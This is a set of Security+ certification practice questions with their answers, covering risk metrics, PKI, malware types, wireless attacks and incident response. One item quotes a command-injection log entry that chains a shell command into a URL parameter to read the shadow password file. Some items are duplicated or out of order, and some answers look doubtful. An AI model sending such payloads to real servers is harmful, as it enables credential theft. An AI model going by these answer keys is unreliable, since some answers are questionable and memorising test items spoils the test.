ALE ARO

Which of the following metrics are used to calculate the SLE? (Select TWO)

ALE ARO

As the IT department head for a local school district, you're searching for a way to promote safe/responsible use of the Internet for the students. With the help from some local teachers, you work through developing a document for students to sign. This document describes the methods of accessing the Internet via the school's network. Which of the following is the best description of this document?

Acceptable Use Policy

A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known vulnerability. Which of the following risk responses does this BEST describe?

Acceptance

A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known vulnerability. Which of the following risk responses does this BEST describe?

Acceptance

Matt manages database security for a university and he's concerned about ensuring that appropriate security measures are implemented. Which is the most important to database security?

Access Control Policies

During a routine audit, it is discovered that someone has been using a stale administrator account to log into a seldom used server. The person has been using the server to view inappropriate websites that are prohibited to end users. Which of the following would best prevent this from occurring again?

Account expiration policy

A network administrator is brute forcing accounts through a web interface. Which of the following would provide the BEST defense from an account password being discovered?

Account lockout

Joe notices there are several user accounts on the local network generating spam with embedded malicious code. Which of the following technical control should Joe put in place to BEST reduce these incidents?

Account lockout

Jakob is worried that someone will use a password cracker on the computers in his company. He's concerned that common passwords will be attempted in order to gain access to a system. Which would be the best option to mitigate the threat?

Account lockout policies

Of the listed principles, which one is the most important in managing account permissions?

Account recertification

A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?

Accounting

A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?

Accounting

A security administrator has configured a RADIUS and a TACACS+ server on the company's network. Network devices will be required to connect to the TACACS+ server for authentication and send accounting information to the RADIUS server. Given the information: Which of the following should be configured on the network client? (Select two)

Accounting port UDP 1813 Authentication port TCP 49

A member of the human resources department is searching for candidate resumes and encounters the following error message when attempting to access popular job search websites: Site Cannot Be Displayed: Unauthorized Access Policy Violation: Job Search User Group: Retail_Employee_Access Client Address: 10.13.78.145 DNS Server: 10.1.1.29 Proxy IP Address: 10.1.1.29 Contact your systems administrator for assistance. Which of the following would resolve this issue without compromising the company's security policies?

Add the employee to a less restrictive group on the content filter

When considering a third-party cloud service provider, which of the following criteria would be the BEST to include in the security assessment process? (Select two)

Adherence to regulatory compliance Data retention policies

The security administrator has noticed cars parked just outside of the building fence line. Which of the following security measures can the administrator use to help protect the company's WiFi network against war driving? (Select two)

Adjust power level controls Change antenna placement

A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy?

Administrative

A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy?

Administrative

Adhering to a layered security approach, a controlled access facility employs security guards who verify the authorization of all personnel entering the facility. Which of the following terms BEST describes the security control being employed?

Administrative

When configuring settings in a mandatory access control environment, which of the following specifies the subjects that can access specific data objects?

Administrator

Josh is a bank manager and has suspicions that one of his tellers has stolen money from their respective station. After talking with his supervisor, he places the employee on leave with pay, changes their computer account to suspended, and takes their prox card and building keys. Which procedure was followed?

Adverse Actions

A technician is investigating a potentially compromised device with the following symptoms: Which of the following types of malware has infected the system?

Adware

Develop and implement updated access control policies Assess and eliminate inactive accounts

After a merger between two companies a security analyst has been asked to ensure that the organization's systems are secured against infiltration by any former employees that were terminated during the transition. Which of the following actions are MOST appropriate to harden applications against infiltration by former employees? (Select TWO)

A development team has adopted a new approach to projects in which feedback is iterative and multiple iterations of deployments are provided within an application's full life cycle. Which of the following software development methodologies is the development team using?

Agile

Which of the following development models entail several iterative and incremental software development methodologies such as Scrum?

Agile

When sending a message using symmetric encryption, which of the following must happen FIRST?

Agree on an encryption method

A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops' local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this?

Air gap the desktops

A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops' local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this?

Air gap the desktops.

A software developer is concerned about DLL hijacking in an application being written. Which of the following is the MOST viable mitigation measure of this type of attack?

All calls to different DLLs should be hard-coded in the application

A software developer is concerned about DLL hijacking in an application being written. Which of the following is the MOST viable mitigation measure of this type of attack?

All calls to different DLLs should be hard-coded in the application

Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time?

Antivirus

Liz is responsible for incident response at her company. One of her jobs is to attempt to attribute attacks to a specific type of attacker. Which of the following is not an attribute that would be considered in attributing the attack?

Amount of data stolen

Which of the following implements two-factor authentication?

An ATM requiring a credit card and PIN

A member of the admin group reports being unable to modify the "change" file on a server. The permissions on the file are as follows: Based on the output above, which of the following BEST explains why the user is unable to modify the "changes" file?

An FACL has been added to the permissions for the file

A member of the admins group reports being unable to modify the "changes" file on a server. The permissions on the file are as follows: Permissions User Group File -rwxrw-r--+ Admins Admins zChanges Based on the output above, which of the following BEST explains why the user is unable to modify the "changes" file?

An FACL has been added to the permissions for the file.

Which of the following is the BEST choice for a security control that represents a preventive and corrective logical controls at the same time?

Antivirus

A company is developing new secure technology and requires computers being used for development to be isolated. Which of the following should be implemented to provide the MOST secure environment?

An air-gapped computer network

Using a similar wireless configuration of a nearby network

An attack that is using interference as its main attack to impede network traffic is which of the following?

Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator?

An attacker could potentially perform a downgrade attack. The IPSec payload reverted to a 16-bit sequence numbers.

Which of the following could occur when both strong and weak ciphers are configured on the VPN concentrator? (Select two)

An attacker could potentially perform a downgrade attack/ Te IPSec payload reverted to 16-bit sequence numbers

A security analyst receives a notification from the IDS after working hours, indicating a spike in network traffic. Which of the following BEST describes this type of IDS?

Anomaly-based

A security analyst observes the following events in the logs of an employee workstation: 1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level. 1/23 1:07:09 1034 The scan is completed. No detections were found. The security analyst reviews the file system and observes the following: C:\>dir C:\Users\user\temp 1/23 1:07:02 oasdfkh.hta 1/23 1:07:02 update.bat 1/23 1:07:02 msg.txt Given the information provided, which of the following MOST likely occurred on the workstation?

Application white listing controls blocked an exploit payload from executing.

A security analyst observes the following events in the logs of an employee workstation: Given the information provided, which of the following MOST likely occurred on the workstation?

Application whitelisting controls blocked an exploit payload from executing

A small to medium sized company wants to block the use of USB devices on its network. Which of the following is the MOST cost-effective way for the security analyst to prevent this?

Apply a GPO

Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices on their home networks?

Apply firmware and software updates upon availability

A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports include the following critical-rated vulnerability: Title: Remote Command Execution vulnerability in web server Rating: Critical (CVSS 10.0) Which of the following actions should the security analyst perform FIRST?

Apply organizational context to the risk rating

A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports include the following critical-rated vulnerability: Title: Remote Command Execution vulnerability in web server Rating : Critical (CVSS 10.0) Threat actor: any remote user of the web server Confidence: certain Recommendation: apply vendor patches Which of the following actions should the security analyst perform FIRST?

Apply organizational context to the risk rating.

A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task?

Arp -s 192.168.1.1 00-3a-d1-fa-b1-06

A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task?

Arp- s 192.168.1.1 00- 3a-d1-fa-b1-06

After a merger between two companies, a security analyst has been asked to ensure that the organization's systems are secured against infiltration by any former employees that were terminated during the transition. Which of the following actions is MOST appropriate to harden applications against infiltration by former employees? (Select two)

Assess and eliminate inactive accounts Develop and implement updated access control policies

Which encryption type offers easy key exchange and key management?

Asymmetric

Which of the following encryption methods does PKI typically use to securely protect keys?

Asymmetric

Joe is exchanging encrypted email with another party. Joe encrypts the initial email with a key. When Joe receives a response, he is unable to decrypt the response with the same key he used initially. Which of the following would explain the situation?

Asymmetric encryption is being used

During an application design, the development team specifics an LDAP module for single sign-on communication with the company's access control database. This is an example of which of the following?

Authentication

Of the listed principles, which process would transpire if a user provides a correct username and password?

Authentication

Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file?

Authentication issues

Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file?

Authentication issues

Recently several employees were victims of a phishing email that appeared to originate from the company president. The email claimed the employees would be disciplined if they did not click on a malicious link in the message. Which of the following principles of social engineering made this attack successful?

Authority

An employee in the finance department receives an email, which appears to come from the Chief Financial Officer (CFO), instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (Select two)

Authority Urgency

Which of the following should identify critical systems and components?

BCP

Caleb is worried his SIEM logs aren't being stored long enough or securely enough. He is aware that a breach may not be discovered until long after it occurs. This would require the company to analyze older logs, so it's important that he finds a SIEM log backup solution that can do the following: handle all aggregate logs of the SIEM, be maintained for a long period of time, and maintain the integrity of logs being stored. Which of the following solutions would ensure the integrity of the data isn't changed after storage?

Back up WORM storage

An analyst is part of a team that is investigating a potential breach of sensitive data at a large financial services organization. The organization suspects a breach occurred when proprietary data was disclosed to the public. The team finds servers were accessed using shared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was MOST likely to have been utilized to exfiltrate the proprietary data?

Backdoor

Ann, an employee in the payroll department, has contracted the help desk citing multiple issues with her device, including: Slow performance Word documents, PDFs, and images no longer opening A pop-up Ann states the issues began after she opened an invoice that a vendor emailed to her. Upon opening the invoice, she had to click several security warnings to view it in her word processor. With which of the following is the device MOST likely infected?

Backdoor

You work for a company that has outsourced development of a specific application to a local programming firm, however, after three months of using the product, one of your accountants accidentally discovers a way to log in and bypass all security and authentication. Of the following options, what best describes this?

Backdoor

A security analyst is investigating a security breach. Upon inspection of the audit access logs, the analyst notices the host was accessed and the /etc/passwd file was modified with a new entry for username "gotcha" and user ID of 0. Which of the following are the MOST likely attack vector and tool the analyst should use to determine if the attack is still ongoing? (Select two)

Backdoor Netstat

A security auditor is performing a vulnerability scan to find out if mobile applications used in the organization are secure. The auditor discovers that one application has been accessed remotely with no legitimate account credentials. After investigating, it seems the application has allowed some users to bypass authentication of that application. Which of the following types of malware allow such a compromise to take place? (Select two)

Backdoor RAT

The web server administrator at your e-commerce company is concerned about someone using netcat to connect to the company web server to retrieve detailed information. What best describes this concern?

Banner Grabbing

The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?

Behavior-based IPS with a communication link to a cloud-based vulnerability and threatfeed

A company has a data classification system with definitions for "Private" and "Public". The company's security policy outlines how data should be protected based on type. The company recently added the data type "Proprietary". Which of the following is the MOST likely reason the company added this data type?

Better data classification

A company has a data classification system with definitions for "Private" and "Public". the company's security policy outlines how data should be protected based on type. The company recently added data type "Proprietary". Which of the following is the MOST likely reason the company added this data type?

Better data classification

An auditor has identified an access control system that can incorrectly accept an access attempt by an unauthorized user. Which of the following authentication systems has the auditor reviewed?

Biometric-based

A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks?

Block access to personal email on corporate systems Update corporate policy to prohibit access to social media websites

Michael manages the secure communications at his company and would like to give administrators the option to log in remotely and execute command-line functions. He would like for this to only be possible via a secure encrypted connection. What action should be taken on the firewall?

Block port 23 and allow port 22

Nicole noticed when she's in a crowded area, she gets a stream of unwanted texts. They end when she leaves the area. What is the attack just described?

Bluejacking

Which of the following attack types is being carried out where a target is being sent unsolicited messages via Bluetooth?

Bluejacking

Richard discovered that someone was able to obtain some information from his smartphone using a Bluetooth connection. The attacker was able to get a contact list and some emails. What type of attack is this?

Bluesnarfing

You've noticed when in a crowded area, data from your cell phone is stolen. When performing an investigation, you notice a Bluetooth connection in your phone that is unfamiliar. What describes this attack?

Bluesnarfing

Laura manages the physical security for her company. She's especially concerned about an attacker driving a vehicle into the building. Which option below would protect against this threat?

Bollards

Michael is analyzing strange behavior by some of the computers on his network. He believes the machines contain some malware. The symptoms include strange behavior that continues even if they boot to a Linux Live CD. What is the most probable cause?

Boot Sector Virus

A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue?

Botnet

Of the following, which best describes a compromised collection of computers being controlled from one central point?

Botnet

Of the following, which is commonly used in a DDoS attack?

Botnet

A vulnerability scanner that uses its running service's access level to better assess vulnerabilities across multiple assets within an organization is performing a:

Credentialed scan

The chief security officer at a multinational banking corporation is reviewing a plan to upgrade the entire corporate it infrastructure architecture consists of a centralized Cloud environment hosting the majority of data, small server clusters at each corporate location to handle the majority of customer transaction processing, ATMs, and a new mobile banking application accessible from smartphones tablets and the internet via HTTP. The corporation does business having varying data retention and privacy laws. Which of the following technical modifications to the architecture and corresponding security control should be implemented to provide the most complete protection of data? A. Revoke exiting root certificates, reissue new customer certificates, and ensure all transactions are digitally signed to minimize fraud, Implement encryption for data in transit between data and centers. B Ensure all data is encryption according to the most stringent regulatory guidance applicable Implement encryption for data and Transit between data centers, increase data availability by replicating all data, transaction data, logs between corporate locations C Store customer data based on National borders and Shore end-to-end encryption between ATMs, and users, and servers, test redundancy and Co plans to ensure data is not inadvertently shifted from one legal jurisdiction to another with more stringent regulations D Install redundant service to handle corporate customer processing and encrypt all customer data to ease the transfer from one country to another, Implement end-to-end encryption between mobile applications and the cloud.

C

Two users need to send each other emails over unsecured channels. The system should support the principle of non-repudiation. Which of the following should be used to sign the user's certificates?

CA

An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using?

CASB

Which of the following AES modes of operation provide authentication? (Select two)

CCM GCM

Isaac is in need of an authentication protocol that would be effective when it comes to stopping a session hijacking. Which of the following would be the best choice?

CHAP

A security administrator is tasked with implementing centralized management of all network devices. Network administrators will be required to logon to network devices using their LDAP credentials. All commands executed by network administrators on network devices must fall within a preset list of authorized commands and must be logged to a central facility. Which of the following configuration commands should be implemented to enforce this requirement?

CN=company, CN=com, OU=netadmin, DC=192.32.10.233

Sheila is the security administrator for a company where most employees use handheld devices such as smartphones and tablets. The employees would like to use the devices for work and home as well. Which of the following is the most secure solution?

COPE

Laura manages DLP for a large company where some employees have COPE and some have BYOD. What DLP issue could these devices present?

COPE (Corporate Owned Personally Enabled) and BYOD (Bring our Own Device) devices can be used as a USB OTG (On The Go) resource

A member of a digital forensics team, Joe arrives at a crime scene and is preparing to collect system data. Before powering the system off, Joe knows that he must collect the most volatile date first. Which of the following is the correct order in which Joe should collect the data?

CPU cache, RAM, paging/swap files, remote logging data

A security administrator must implement a system to ensure that invalid certificates are not used by a custom developed application. The system must be able to check the validity of certificates even when internet access is unavailable. Which of the following MUST be implemented to support this requirement?

CRL

A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue?

CRL

A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue?

CRL

An organization needs to implement a large PKI. Network engineers are concerned that repeated transmission of the OCSP will impact network performance. Which of the following should the security analyst recommend is lieu of an OCSP?

CRL

While troubleshooting a client application connecting to the network, the security administrator notices the following error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is valid?

CRL

While troubleshooting a client application connection to the network, a security administrator notices the following error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is valid?

CRL

Josh is a security technician who's been tasked with implementing PKI on the company's network. When verifying the validity of the certificate, he needs to ensure bandwidth isn't being consumed. What can be implemented?

CRL (Certificate Revocation List)

You currently use a PKI (public key infrastructure) in your company to issue digital certificates to users. Recently, you've had temporary contractors for a project that is now complete, and management has asked that all digital certificates be revoked. Which PKI component should be consulted for the request?

CRL (Certificate Revocation List)

A security administrator receives notice that a third-party certificate authority has been compromised, and new certificates will need to be issued. Which of the following should the administrators submit to receive a new certificate?

CSR

Jason needs to renew the certificate for his company's web server. Which of the following is recommended to be submitted to the CA?

CSR (Certificate Signing Request)

Which of the following is the main difference an XSS vulnerability and a CSRF vulnerability? (Select two)

CSRF needs the victim to be authenticated to the trusted server XSS does not need the victim to be authenticated to the trusted server

A company is using a mobile device deployment model in which employees use their personal devices for work at their own discretion. Some of the problems the company is encountering include the following: There is no standardization Employees ask for reimbursement for their devices Employees do not replace their devices often enough to keep them running efficiently The company does not have enough control over the devices Which of the following is a deployment model that would help the company overcome these problems?

CYOD

Frank is responsible for network security at a university where faculty members are being issued laptops. Many of the faculty members leave their laptops in their offices most of the time. Frank is concerned about device theft. In this situation, what would be the most cost-effective method to secure the laptops?

Cable Locks

Which of the following locations contain the MOST volatile data?

Cache memory

Which of the following is the proper way to quantify the total monetary damage resulting from an exploited vulnerability?

Calculate the ALE

Steven is constantly receiving calls from wireless users who are being redirected to a login page when they connect to the network. The login page comes up whenever the users first connect to the network and attempt to access any website outside of the local area network from within their web browsers. Which of the following is causing this to happen?

Captive Portal

A network technician is setting up a segmented network that will utilize a separate ISP to provide wireless access to the public area for a company. Which of the following wireless security methods should the technician implement to provide basic accountability for access to the public network?

Captive portal

A wireless network has the following design requirements: Which of the following should be used in the design to meet the requirements? (Select two)

Captive portals PSK

An incident responder receives a call from a user who reports a computer is exhibiting symptoms consistent with a malware infection. Which of the following steps should the responder perform NEXT?

Capture and document necessary information to assist in the response

The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is recieve reports that users are experiencing the following error when attemping to log in to their previous system: Logon Failure: Access Denied Which of the following can cause the issue?

Certificate Issues

The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is receiving reports that users are experiencing the following error when attempting to log into their previous system: Logon Failure: Access Denied Which of the following can cause this issue?

Certificate issues

An attacker compromises a public CA and issues unauthorized X.509 certificates for Company.com. In the future, Company.com wants to mitigate the impact of similar incidents. Which of the following would assist Company.com with its goal?

Certificate pinning

A security engineer must install the same x.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use?

Certificate utilizing the SAN file

A security engineer must install the same x.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use?

Certificate utilizing the SAN file

A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select two)

Certificate-based authentication FTP over a non-standard pot

Which of the following must be intact for evidence to be admissible in court?

Chain of custody

Isaac is looking for a physical access solution for his company. He needs the solution to use asymmetric cryptography or public-key cryptography to authorize users. What type of solution is he seeking?

Challenge response token

Of the listed principles, which one states that multiple changes made to computer systems shouldn't be made simultaneously?

Change Management

An organization is comparing and contrasting migration from its standard desktop configuration to the newest version of the platform. Before this can happen, the Chief Information Security Officer (CISO) voices the need to evaluate the functionality of the newer desktop platform to ensure interoperability with existing software in use by the organization. In which of the following principle of architecture and design is the CISO engaging?

Change management

A company researched the root cause of a recent vulnerability in its software. It was determined that the vulnerability was the result of two updates made in the last release. Each update alone would not have resulted in the vulnerability. In order to prevent similar situations in the future, the company should improve which of the following?

Change management procedures

Which of the following is considered a step in account maintenance?

Check to see that all accounts are for active employees

As the security administrator, you're concerned about a variety of attacks that could affect your company's web server. You've recently heard about an attack where an attacker sends more data to a target than the target is expecting. If done correctly, this can cause the target to crash. What type of action can best prevent this type of attack?

Checking buffer boundaries

A system's administrator has finished configuring firewall ACL to allow access to a new web server: Permit tcp from: any to: 192.168.1.10:80Permit tcp from: any to: 192.168.1.10:443Deny tcp from: any to: any The security administrator confirms form the following packet capture that there is network traffic from the internet to the web server: The company's internal auditor issues a security finding and requests that immediate action be taken. With which of the following is the auditor MOST concerned?

Clear text credentials

Of the list below, what type of attack involves users clicking on something different on a website then what they intended to click on?

Clickjacking

Sharon is responsible for the security on web applications. She's looking to see if all applications have input validation. What is the best way to implement validation?

Client-side and server-side validation

A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement?

Cloud-based site

A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away. The company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement?

Cloud-based site

A new mobile application is being developed in-house. Security reviews did not pick up any major flaws, however, vulnerability scanning results show fundamental issues at the very end of the project cycle. Which of the following security activities should also have been performed to discover vulnerabilities earlier in the life cycle?

Code review

What type of attack exists when an attacker tries to find an input value that will produce the same hash as a password?

Collision Attack

An administrator discovers the following log entry on a server: "Nov 12 2013 00:23:45 httpd[2342]: GET/app2/prod/proc/process.php?input=change;cd%20../../../etc;cat%20shadow" Which of the following attacks is being attempted?

Command injection

A group of non-profit agencies wants to implement a cloud service to share resources with each other and minimize costs. Which of the following cloud deployment models BEST describes this type of effort?

Community

Which of the following types of cloud infrastructures would allow several organizations with similar structures and interests to realize the benefits of shared storage and resources?

Community

Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market?

Competitor

Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market?

Competitor

A security administrator discovered that an attack has been completed against a node on the corporate network. All available logs were collected and stored. You must review all network logs to discover the scope of the attack, check the box of the node(s) that have been compromised and drag and drop the appropriate actions to complete the incident response on the network. The environment is a critical production environment; perform the LEAST disruptive actions on the network, while still performing the appropriate incident responses.

Compromised node = database server (bottom right). ACTIONS: capture network traffic, chain of custody

An organization relies heavily on an application that has a high frequency of security updates. At present, the security team only updates the application on the first Monday of each month, even though the security updates are released as often as twice a week. Which of the following would be the BEST method of updating this application?

Configure testing and automate patch management for the application

A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this?

Configure the OS default TTL to 1

A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the internet regardless of the network firewall of other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this?

Configure the OS default TTL to 1

From the list below, choose the type of attack that exploits the trust of a website for an authenticated user to attack the website by spoofing requests from the trusted user:

Cross-Site Request Forgery

An administrator has concerns regarding the traveling sales team who works primarily from smartphones. Given the sensitive nature of their work, which of the following would BEST prevent access to the data in case of loss or theft?

Configure the smartphones so that the stored data can be destroyed from a centralized location

An organization has several production-critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software?

Configure the systems to ensure only necessary applications are able to run

A Chief Information Security Officer (CISO) has tasked a security analyst with assessing the security posture of an organization and which internal factors would contribute to a security compromise. The analyst performs a walk-through of the organization and discovers there are multiple instances of unlabeled optical media on office desks. Employees in the vicinity either do not claim ownership of disavow any knowledge concerning who owns the media. Which of the following is the MOST immediate action to be taken?

Confiscate the media and dispose of it in a secure manner as per company policy

While investigating a virus infection, a security analyst discovered the following on an employee laptop: multiple folders containing a large number of newly released movies and music files; proprietary company data; a large amount of PHI data; unapproved FTP software; documents that appear to belong to a competitor. Which of the following should the analyst do FIRST?

Contact the legal and compliance department for guidance

Amy manages mobile device security for her company, an insurance firm. The company currently uses BYOD. She's concerned about employees' personal device usage compromising company data on the mobile devices. What technology could best assist with this concern?

Containerization

A systems administrator wants to protect data stored on mobile devices that are used to scan and record assets in a warehouse. The control must automatically destroy the secure container of mobile devices if they leave the warehouse. Which of the following should the administrator implement? (Select two)

Containerization Geofencing

You have identified a malware incident on your company network. Which of the following items should you attempt first?

Containment

You are responsible for security for a defense contracting company and are concerned about users within your network exfiltrating data via sensitive documents to emails. What is the best solution to address this?

Content Filtering

During a lessons learned meeting regarding a previous incident, the security team receives a follow-up action item with the following requirements: (1) allow authentication from within the US anytime (2) allow authentication if the user is accessing email or a shared file system (3) do not allow authentication if the AV program is two days out of date (4) do not allow authentication if the location of the device is in two specific countries. Given the requirements, which of the following mobile deployment authentication types is being utilized?

Context-aware authentication

A security administrator returning from a short vacation receives an account lock-out message when attempting to log into the computer. After getting the account unlocked the security administrator immediately notices a large number of email alerts pertaining to several different user accounts being locked out during the past three days. The security administrator uses system logs to determine that the lock-outs were due to a brute force attack on all accounts that have been previously logged into that machine. Which of the following can be implemented to reduce the likelihood of this attack going undetected?

Continuous monitoring

A technician has installed new vulnerability scanner software on a server that is joined to the company domain. The vulnerability scanner is able to provide visibility over the patch posture of all company's clients. Which of the following is being used?

Credentialed scan

Which of the following controls allows a security guard to perform a post-incident review?

Corrective

Tim is managing the SIEM for his company. The SIEM aggregates logs from multiple servers. In the event a breach is discovered, which would be the most important concern?

Correlation

To reduce disk consumption, an organization's legal department has recently approved a new policy setting the data retention period for the sent email at six months. Which of the following is the BEST way to ensure this goal is met?

Create a daily encrypted backup of the relevant emails

A new intern in the purchasing department requires read access to shared documents. Permissions are normally controlled through a group called "Purchasing", however, the purchasing group permissions allow write access. Which of the following would be the BEST course of action?

Create a new group that has only read permissions for the files

An administrator has configured a new Linux server with the FTP service. Upon verifying that the service was configured correctly, the administrator has several users test the FTP service. Users report that they are able to connect to the FTP service and download their personal files, however, they cannot transfer new files to the server. Which of the following will most likely fix the uploading issue for the users?

Create an ACL to allow the FTP service write access to user directories

A security administrator is implementing a new WAF solution and has placed some of the web servers behind the WAF, with the WAF set to audit mode. When reviewing the audit logs of external requests and posts to the web servers, the administrator finds the following entry: Based on this data, which of the following actions should the administrator take?

Create an alert to generate emails for abnormally high activity

A security administrator determined that users within the company are installing unapproved software. Company policy dictates that only certain applications may be installed or ran on the user's computers without exception. Which of the following should the administrator do to prevent all unapproved software from running on the user's computer?

Create an application whitelist and use OS controls to enforce it

A security administrator wants to determine if a company's web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted?

Credentialed

A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed?

Credentialed

A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of the scan being performed?

Credentialed

A mobile device user is concerned about geographic positioning information being included in messages sent between users on a popular social network platform. The user turns off the functionality in the application, but wants to ensure the application cannot re-enable the setting without the knowledge of the user. Which of the following mobile device capabilities should the user disable to achieve the stated goal? A. Device access control B. Location based services C. Application control D. GEO-Tagging

D

A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the preupdate area of the OS, which indicates it was pushed from the central patch system. File: winx86_adobe_flash_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 The administrator pulls a report from the patch management system with the following output: Given the above outputs, which of the following MOST likely happened? A. The file was corrupted after it left the patch system. B. The file was infected when the patch manager downloaded it. C. The file was not approved in the application whitelist system. D. The file was embedded with a logic bomb to evade detection.

D

A security administrator receives notice that a third party certificate authority has been compromised, and new certificates will need to be issued. Which of the following should the administrator submit to receive a new certificate? A. CRL B. OSCP C. PFX D. CSR E. CA

D

Ann, an employee in the payroll department, has contacted the helpdesk citing multiple issues with her device, including: -slow performance -Word documents, PDFs, and images no longer opening -a pop up Ann states the issues began after she opened an invoice that a vendor email to her upon opening the invoice, she had to click several security warnings to view it in her word processor. With which of the following is the device most likely infected? A spyware B crypto malware c rootkit d backdoor

D

Chief executive officer suspects someone in the lab testing environment is stealing confidential information after working hours when no one else is around. Which of the following actions can help to prevent a specific threat? A. Implement time of day restrictions B audit file access times C secretly install a hidden surveillance camera D require swipe card access to enter the lab

D

The SSID broadcast for a wireless router has been disabled but a network administrator notices that unauthorized users are accessing the wireless network. The administrator has determined that attackers are still able to detect the presence of the wireless network despite the fact the SSID has been disabled. Which of the following would further obscure the presence of the wireless network? A Upgrade the encryption to WPA or WPA2 B. Create a non-zero length SSID for the wireless router C. Reroute Wireless users to a Honeypot D. Disable responses to a broadcast probe request

D

Users are attempting to access a company's website but are transparently redirected to other websites. The user confirm the URL is correct. Which of the following would BEST prevent this issue in the future?

DNSSEC

You have network users that are able to assign permissions to their own shared resources such as folders and data drives. Which access control model is currently being used?

DAC (Discretionary Access Control)

John works on database server security for his company. He is concerned about preventing unauthorized access to the databases. Which of the following is the most appropriate for him to implement?

DAMP (Data Activity Monitoring Prevention)

Many employees are receiving email messages to the one shown below: Which of the following should the security administrator configure on the corporate content filter to prevent users from accessing the phishing URL, while at the same time minimizing false positives?

DENY http://*.info

Buddy is the security manager for a bank and has recently been reading about malware that accesses system memory modules. He would like to find a solution that keeps programs from utilizing system memory. Which of the options would be the best solution?

DEP (Data Execution Prevention)

Which standard shown here uses a single 56-bit symmetric key?

DES

Of the listed encryption algorithms, which one is the weakest?

DES (Data encryption Standard)

Josh noticed that an attacker is trying to get network passwords by using a software that attempts a number of passwords from a list of common passwords. What type of attack is this called?

Dictionary

Students at a residence hall are reporting internet connectivity issues. The university's network administrator configured the residence hall's network to provide public IP addresses to all connected devices, but many students are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall's network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation?

DHCP snooping

